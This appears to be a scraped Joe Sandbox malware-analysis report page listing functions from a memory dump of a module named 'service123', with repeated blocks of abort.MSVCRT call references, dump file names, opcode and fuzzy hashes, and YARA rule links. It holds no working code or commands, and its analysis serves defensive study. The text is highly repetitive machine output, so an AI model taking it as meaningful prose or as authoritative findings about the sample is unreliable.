abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 63c9f247f76b6577f221dad42fbc28a27a186be82e7ce312212f80a00bbb2771
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: B0F027315CCA3A8A87002A9D80104A1B3377A6B30CB9BC445C4807BF14C211F543C641

Function 6C9DBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57a7f6efdefef99651173d008152d1ad02eec56f3a53fc764c197dd3696da68
Instruction ID: a83f1da3d9581e3fe3af2e6064369a0a9f107a969fd1f5b8478bd593febb69cf
Opcode Fuzzy Hash: e57a7f6efdefef99651173d008152d1ad02eec56f3a53fc764c197dd3696da68
Instruction Fuzzy Hash: 290149B3A05E2607D3004EB9C4A1361B6A25F82258F1BC669C97627F8AC234F819DA40

Function 6C9DBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 3a817aea1e54dfeec1c7cf4f49e0a2a06ab5cdea5adee5decf37f3ec8215411f
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 92E08C7364AB2A4B861069DCB4400FAB2649F6739CF175C28C949B3E00D341F948C6C2

Function 6C9DBE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 0915a5a7fa9844631854f8c171f5bd60099aa0d162520e60898f1f24cb869dc0
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 8BD0A77154D62B4B8B055F6D80988EDF3F56F6B34C71B9D98C045F3E05D621FA0ACA04

Function 6C9DBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 26478e53ed8451bb1e61b2086572c1e876aa3cd7bf396a5dc8243d7ffb0d603c
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: E5D017B0189B198F8300EF48D1948A9F7F5AF6F319B039E69C409A7F24D635E508CA01

Function 6C9DBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 3c7f0c72256e53b97041b6aa38730c25854bd925b78cc8494551f2cf7878d7ca
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: EEC012629897294BC3102DD950503A6F2A49F3B25CF176C1C884533F008B51F805C545

Function 6C9DBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 1ad79269855cf05e02b1ac9f5e332d1ad24c87d3ec5fbad9c3aff83474684a3d
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: F6C012756497258B8341AEC890504E9B274AF7F34CF072C58C40173F008760F509C541

Function 6C9DBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
